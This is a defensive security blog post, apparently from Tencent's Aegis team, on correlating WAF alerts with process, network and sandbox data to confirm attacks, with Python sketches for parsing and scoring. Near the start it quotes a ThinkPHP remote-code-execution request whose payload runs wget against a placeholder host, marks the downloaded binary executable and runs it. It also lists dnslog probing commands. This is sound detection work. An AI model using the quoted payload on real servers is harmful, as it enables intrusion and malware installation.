Threat discovery under automated data analysis
2022-06-24 05:22:00 【Tencent Security Emergency Response Center】
Background
I don't remember exactly how long ago it was, probably at 15:37:25.181 on September 3, 2020, that I wrote an article about data analysis in the information-gathering process (link to the original text). Some readers may ask why I remember such a precise time so clearly: because I made it up. Getting down to business, both articles are about data analysis. The previous one analyzed the data used during an attack; this one is its sister piece and focuses on the data analysis used in security operations, that is, on the enterprise defense side.
Break the ice!
Before we start, let's look at an attack HTTP packet (the source and destination IPs and other information are omitted). Readers may want to think about it first: what useful information can we obtain or reconstruct from this HTTP packet?
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Host: x.x.x.x
Typically, readers will focus on analyzing the contents of the HTTP packet, such as the attack technique, and an experienced security engineer can even point out that it targets a ThinkPHP vulnerability. In fact, much more information is hidden beneath the iceberg. To dig it out, we first need to reason through all the possible paths the attack could take as it evolves, which I have simplified into the following figure:
Overall, the information we obtain falls into two categories. Direct information is the basic information about this HTTP packet, including the time, the attack technique, and so on. Indirect information covers everything that may appear as the attack subsequently evolves, including processes, communications, and so on.
Why do this? Because in real operations we have found that it is hard to close the loop on an alert by relying on direct information alone or on indirect information alone. Take the direct information of an attack as an example: our WAF produces countless alerts like the one above every day, and they are basically not actionable. If we instead apply automated data analysis to the direct and indirect information together, we can filter out false positives and achieve high-accuracy alerting.
So what?
We have just covered why automated data analysis is worth doing, and I believe readers are more curious about how to do it. My team is the traffic analysis team, so using traffic to implement automated data analysis is a major focus of this article.
Next, we continue with the same example. The first question to think about is: "Why can't direct information form an effective alert?" Simply put, we don't know whether the attack was executed successfully. So we move the perspective further down the timeline: if there is indirect information showing that it was executed successfully, we have a complete chain of evidence. It is like hearing that your ex-girlfriend was proposed to on Qixi (Tanabata). You may want to know whether the proposal succeeded; although you were not there, you can judge it by whether they hold a wedding in the near future or whether they obtain a marriage certificate. Here, I have briefly sorted out the events that can serve as evidence in the case above:
● The server executes the file download command
● The server is downloading or has downloaded the file
● The server is executing or has executed the file
● The file communicates with external hosts while it runs
In summary, if any one of the above behaviors can be confirmed on top of the attack behavior, we can confirm that the attack succeeded. The benefits are clear: using data analysis rather than relying purely on traditional rules reduces rule maintenance, improves generality, and makes alert operations more accurate.
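The "any one of these confirms it" logic can be sketched in a few lines of Python. This is only an illustration: the Evidence names, the Observation record, and matching on a host name are assumptions made for the example, not the team's actual implementation.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Iterable, List


class Evidence(Enum):
    """The four supporting events listed above (names are illustrative)."""
    DOWNLOAD_COMMAND_EXECUTED = "download command executed"
    FILE_DOWNLOADED = "file downloading or downloaded"
    FILE_EXECUTED = "file executing or executed"
    EXTERNAL_COMMUNICATION = "external communication during execution"


@dataclass(frozen=True)
class Observation:
    host: str           # server on which the behavior was observed
    evidence: Evidence  # which of the four behaviors it is


def supporting_evidence(target_host: str, observations: Iterable[Observation]) -> List[str]:
    """Return the distinct kinds of evidence observed on the attacked host."""
    kinds = {o.evidence.value for o in observations if o.host == target_host}
    return sorted(kinds)


def attack_confirmed(target_host: str, observations: Iterable[Observation]) -> bool:
    """The alert is confirmed if any one supporting behavior is present."""
    return bool(supporting_evidence(target_host, observations))


# Hypothetical observations gathered from other security devices.
observations = [
    Observation("web-01", Evidence.FILE_DOWNLOADED),
    Observation("web-02", Evidence.EXTERNAL_COMMUNICATION),
]
print(attack_confirmed("web-01", observations))  # evidence exists for web-01
print(attack_confirmed("web-03", observations))  # nothing observed on web-03
```

Returning the list of evidence kinds alongside the yes/no answer keeps the chain of evidence visible to whoever handles the alert.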
How is it done?
In practice, the process is a bit like putting an elephant in a refrigerator. The first step is to extract the complete command string and do a simple parse of it. The second step is to run sandbox analysis on the file (if there is one), extract rules relevant to the current attack type, and push the extracted rules to the corresponding security devices. The third step is to correlate data across the NTA, the EDR, the scanner, and the other security devices to drive alert operations.
There are several ways to carry out the first step, extracting the complete command string. The first is the more traditional one, and the idea is simple: parse the complete HTTP request, split its parameters and parameter values into a dictionary (whether they come from GET parameters, the POST body, or cookies), and then use regular expressions to extract common commands from the parameter values. This approach is simple, but it suffers more from both missed detections and false positives. The second approach gathers many similar requests to the same interface, malicious ones together with normal ones, and uses the difference between normal requests and attack requests to extract the command string. This produces relatively few false positives, but it costs more.
wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp
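The first, traditional approach might look roughly like the following Python sketch. The command list in COMMAND_RE and the function names are assumptions chosen for illustration; a real deployment would need a much broader pattern set and would also cover the POST body and cookies.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical, deliberately small list of command names to look for.
COMMAND_RE = re.compile(r"\b(?:wget|curl|chmod|nslookup|ping|dig)\b.*", re.DOTALL)


def query_params(request_line):
    """Split the query string of an HTTP request line into a dictionary."""
    _method, rest = request_line.split(" ", 1)
    target, _version = rest.rsplit(" ", 1)  # the target itself may contain spaces
    _path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def extract_commands(params):
    """Return {parameter: command string} for values that look like commands."""
    found = {}
    for name, value in params.items():
        match = COMMAND_RE.search(value.strip().strip("'\""))
        if match:
            found[name] = match.group(0)
    return found


REQUEST_LINE = (
    r"GET /index.php?s=/index/\think\app/invokefunction"
    r"&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= "
    r"'wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; "
    r"/tmp/.bom thinkphp' HTTP/1.1"
)
commands = extract_commands(query_params(REQUEST_LINE))
print(commands)
```

Because the pattern only recognizes the commands it lists, this sketch shows the same weakness the text describes: anything outside the list is missed, and benign values that happen to contain a listed word are flagged.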
Once the command string has been extracted through the steps above, the remaining processing is relatively simple, and again there are two ways. One is to use shlex, the lexical analysis module in Python's standard library, and call its split method directly to tokenize the command. The other is to use regular expressions for pattern matching. Either way, the URLs, commands, and so on are then extracted.
['wget', 'http://x.x.x.x/bins/bom.x86', '-O', '/tmp/.bom;', 'chmod', '777', '/tmp/.bom;', '/tmp/.bom', 'thinkphp']
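The token list above is what shlex.split returns for the command string. Note that the semicolons stay attached to the preceding token, so a little post-processing is needed to separate the individual commands. The helper names below are assumptions, and the sketch does not handle a semicolon that appears inside a quoted argument.

```python
import shlex


def split_commands(command_string):
    """Tokenize with shlex.split, then start a new command at each ';'."""
    commands, current = [], []
    for token in shlex.split(command_string):
        ends_command = token.endswith(";")
        word = token.rstrip(";")
        if word:
            current.append(word)
        if ends_command and current:
            commands.append(current)
            current = []
    if current:
        commands.append(current)
    return commands


def extract_urls(commands):
    """Collect every token that looks like an HTTP(S) URL."""
    return [t for cmd in commands for t in cmd if t.startswith(("http://", "https://"))]


command_string = "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp"
commands = split_commands(command_string)
urls = extract_urls(commands)
print(commands)
print(urls)
```

Grouping the tokens per command makes it easy to see that the chain downloads a file, makes it executable, and then runs it.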
The second step is to download the remote file referenced by the command string and analyze the executable in a sandbox, extracting the IOCs associated with the file. The corresponding detection rules can also be pushed to the various security devices.
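The sandbox run itself is outside the scope of a short example, but the bookkeeping around it can be sketched. The following Python snippet assumes the sample bytes have already been fetched inside an isolated environment; the IOC fields and the per-device rule format are hypothetical and only show the shape of the data.

```python
import hashlib
from urllib.parse import urlsplit


def build_ioc(download_url, dropped_path, sample_bytes):
    """Collect basic indicators for a downloaded sample."""
    return {
        "url": download_url,
        "host": urlsplit(download_url).hostname,
        "file_path": dropped_path,
        "sha256": hashlib.sha256(sample_bytes).hexdigest(),
    }


def to_rules(ioc):
    """Render the IOC as per-device rules (hypothetical rule format)."""
    return [
        {"device": "NTA", "match": {"host": ioc["host"], "url": ioc["url"]}},
        {"device": "EDR", "match": {"sha256": ioc["sha256"], "file_path": ioc["file_path"]}},
    ]


# Placeholder bytes stand in for a sample fetched inside an isolated sandbox.
ioc = build_ioc("http://x.x.x.x/bins/bom.x86", "/tmp/.bom", b"placeholder sample")
rules = to_rules(ioc)
print(rules)
```

Network indicators go to the traffic side and file indicators go to the endpoint side, which mirrors the split between NTA and EDR described in the three-step outline.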
The third step is relatively simple. It mainly involves collecting the relevant process, network, and other data; requests that need secondary confirmation can also be submitted to the scanner. Finally, the records are matched by time proximity, command similarity, and similar methods to confirm whether they are related. Graph-based correlation can also be used here, which I will not go into.
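A minimal sketch of correlating by time proximity and command similarity is shown below, using difflib.SequenceMatcher from the Python standard library. The five-minute window, the 0.8 similarity threshold, and the event tuple layout are assumptions for illustration, not values from the team's system.

```python
from datetime import datetime, timedelta
from difflib import SequenceMatcher


def correlate(alert_time, alert_command, process_events,
              window=timedelta(minutes=5), min_similarity=0.8):
    """Return process events that follow the alert closely and resemble its command."""
    matches = []
    for event_time, command_line in process_events:
        delay = event_time - alert_time
        if not timedelta(0) <= delay <= window:
            continue  # too early or too late to be caused by this request
        similarity = SequenceMatcher(None, alert_command, command_line).ratio()
        if similarity >= min_similarity:
            matches.append((event_time, command_line))
    return matches


# Hypothetical alert from traffic analysis and process events from an EDR.
alert_time = datetime(2022, 1, 1, 12, 0, 0)
alert_command = "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom"
process_events = [
    (alert_time + timedelta(seconds=2), "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom"),
    (alert_time + timedelta(seconds=5), "ls -la /var/log"),
    (alert_time + timedelta(hours=2), "wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom"),
]
matches = correlate(alert_time, alert_command, process_events)
print(matches)
```

Requiring both conditions is what filters false positives here: an unrelated process close in time is dropped, and so is an identical command that ran long after the request.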
Putting it to use!
With this small case, you should have a basic grasp of the idea behind the data analysis. Different scenarios naturally call for different correlations and outputs, but in short the idea is to analyze and reason about every stage of the attack behavior. Finally, building on the above, here are two small cases of data analysis applied in practice.
Case 1
Through data analysis we can obtain the dnslog domain names, IPs, and so on that attackers use for blind verification, and feed them back into security policies. For example, the following patterns are common in blind verification:
nslookup ad323xzxs[.]qq[.]com
ping ad323xzxs[.]qq[.]com
dig ad323xzxs[.]qq[.]com
dig ad323xzxs @x.x.x.x
curl http://qq[.]com/i/c204f5/5dig/hgl5/
curl ad323xzxs[.]qq[.]com
......
We first use step one to obtain all the domain names and store them in a database. The root domain the attacker uses for verification can then be obtained by processing each pattern separately. For a pattern such as nslookup ad323xzxs.qq.com, split every domain name to get its root domain, group by root domain, and then apply a simple count-based judgment to get the result. The resulting domain names can be fed back into the policy, as shown in the figure below:
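The split, group, and count procedure can be sketched in Python as follows. Taking the last two labels as the root domain is a simplifying assumption (multi-part suffixes such as .com.cn would need a public suffix list), and the tool list, the threshold of three distinct subdomains, and the example domains are all hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

LOOKUP_TOOLS = {"nslookup", "ping", "dig", "curl"}


def extract_domain(command):
    """Return the domain a lookup command targets, or None if there is none."""
    tokens = command.replace("[.]", ".").split()  # undo defanging
    if len(tokens) < 2 or tokens[0] not in LOOKUP_TOOLS:
        return None
    target = tokens[1]
    if "://" in target:
        target = urlsplit(target).hostname or ""
    target = target.split("/")[0].lower()
    if "." not in target or re.fullmatch(r"[\d.]+", target):
        return None  # bare label or IPv4 address
    return target


def root_domain(domain):
    """Naive root: the last two labels of the domain (an assumption)."""
    return ".".join(domain.split(".")[-2:])


def suspicious_roots(commands, min_subdomains=3):
    """Group domains by root and keep roots with many distinct subdomains."""
    groups = defaultdict(set)
    for command in commands:
        domain = extract_domain(command)
        if domain:
            groups[root_domain(domain)].add(domain)
    return {root: len(names) for root, names in groups.items()
            if len(names) >= min_subdomains}


commands = [
    "nslookup a1b2[.]dnslog-example[.]test",
    "ping c3d4[.]dnslog-example[.]test",
    "dig e5f6[.]dnslog-example[.]test",
    "dig e5f6 @x.x.x.x",
    "curl http://www[.]example[.]com/index.html",
]
roots = suspicious_roots(commands)
print(roots)
```

Counting distinct subdomains rather than raw requests reflects how dnslog-style verification works: each probe tends to use a fresh random label under the same root.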
Case 2
Through data analysis, requests suspected of exploiting a vulnerability can be submitted to the scanner for scanning, or the spread of a new vulnerability can be discovered. As mentioned above, comparing a normal request with a request that carries a payload yields the attack payload, and this step also gives us the normal request and the location of the injection point. We can then score the likelihood of a vulnerability according to the payload, for example giving a high score when there is database-dumping behavior, and finally submit the high-scoring requests directly to the scanner for a second scan. The same principle applies to discovering the spread of new vulnerabilities, although the specific processing is slightly different.
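The comparison and scoring described in this case can be sketched as follows. The scoring patterns, the score values, and the threshold of 80 are invented for the example; the diff simply strips the prefix and suffix that the normal and suspect values share.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical scoring rules: (pattern, score). Database dumping scores highest.
SCORE_RULES = [
    (re.compile(r"union\s+select|information_schema|into\s+outfile", re.I), 90),
    (re.compile(r"\b(?:wget|curl)\b", re.I), 70),
]
DEFAULT_SCORE = 10
SCAN_THRESHOLD = 80


def parse_query(query):
    """Split a query string into a {parameter: value} dictionary."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def injected_part(normal_value, suspect_value):
    """Strip the shared prefix and suffix; what remains is the injected part."""
    limit = min(len(normal_value), len(suspect_value))
    start = 0
    while start < limit and normal_value[start] == suspect_value[start]:
        start += 1
    end = 0
    while end < limit - start and normal_value[-1 - end] == suspect_value[-1 - end]:
        end += 1
    return suspect_value[start:len(suspect_value) - end]


def injection_points(normal_query, suspect_query):
    """Return {parameter: payload} for parameters that differ from the baseline."""
    normal = parse_query(normal_query)
    found = {}
    for name, value in parse_query(suspect_query).items():
        baseline = normal.get(name, "")
        if value != baseline:
            found[name] = injected_part(baseline, value)
    return found


def score(payload):
    """Highest score among matching rules, or the default if none match."""
    return max((s for pattern, s in SCORE_RULES if pattern.search(payload)),
               default=DEFAULT_SCORE)


points = injection_points("id=42&page=1", "id=42+union+select+password+from+users&page=1")
to_scan = [name for name, payload in points.items() if score(payload) >= SCAN_THRESHOLD]
print(points, to_scan)
```

The parameters in to_scan are the ones a scanner would be asked to re-test, using the normal request as the template and the identified parameter as the injection point.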
The end!
That brings this article to a close. Readers are welcome to get in touch through messages or comments.
About the Aegis traffic security analysis team
The Aegis traffic security analysis team is part of the Tencent Security Platform Department. Drawing on the department's 15 years of security experience in building a company-level security system, the team focuses on traffic-based attack detection, intrusion detection, traffic blocking, and the construction and deployment of threat intelligence. It continuously mines security risks in traffic, broadens application scenarios, and combines big data, AI, and other cutting-edge technologies to build a defense-in-depth system for network traffic.